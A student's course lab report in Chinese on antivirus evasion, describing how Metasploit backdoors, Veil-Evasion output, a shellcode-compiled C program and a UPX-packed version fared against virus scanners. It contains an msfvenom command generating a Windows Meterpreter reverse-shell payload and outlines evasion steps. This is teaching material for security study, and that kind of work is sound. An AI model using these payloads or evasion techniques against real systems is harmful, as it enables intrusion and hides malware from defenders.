20155209 林虹宇 Exp3 免杀原理与实践

Exp3 免杀原理与实践

使用msf生成后门程序的检测

  • 将上周msf生成的后门文件放在virscan.org中进行扫描

  • 结果很危险

  • 使用msf编码一次进行扫描

  • 使用msf编码10次进行扫描

  • 结果同样很危险,所以单纯改变编码次数并不能免杀。

使用veil-evasion生成

  • 下载安装完成veil-evasion

  • 设置生成免杀文件

  • 生成成功

  • 开启监听

  • 回连成功

  • av测试警告,只剩5个了很不错

使用shellcode编写程序

  • 这个步骤我做了好多次,因为虚拟机ip总在变化,变化一次就要重新生成一次shellcode数组,所以以下截图中ip不同常在。

  • 首先执行命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=443 -f c 生成shellcode数组。

  • 根据这个shellcode数组写出c程序,然后编译c程序生成可在64位windows执行的程序。

  • 将这个可执行的程序拷到windows中。然后在win中运行,kali中监听。但是不好使。

  • 只能在win中下载vs,然后用vs编译生成那个shellcode程序。

  • 生成好了文件,在kali下设置监听

  • 运行文件,获得回连

  • av查杀警告5个,也不错

  • 特意看了一下360,没有用hahaha

给shellcode加壳

  • 使用upx命令加壳

  • 将加壳程序拷到win中,然后跟之前一样,监听,运行加壳程序。回连成功。

  • av查杀警告7个,这壳白加了,要是想用它搞事情就不能用这个了。

  • 但是看了一下360,还是没查出来。

  • 由于都是用虚拟机做的,之前的win上没有安装杀毒软件,然后安装杀毒软件,重新做了次回连。

  • 又用360扫描了一下,只有之前没做免杀的后门被扫了出来

基础问题回答

  • 杀软是如何检测出恶意代码的?

  • 基于特征码的检测、启发式恶意软件检测、基于行为的恶意软件检测;网上答案跟老师讲的差不多

  • 免杀是做什么?

  • 不让杀毒软件查出来。

  • 免杀的基本方法有哪些?

  • 改变特征码、改变行为;参考免杀百度百科“免杀”(跟老师讲的差不多)

posted @ 2018-04-10 20:19  林虹宇  阅读(240)  评论(0编辑  收藏  举报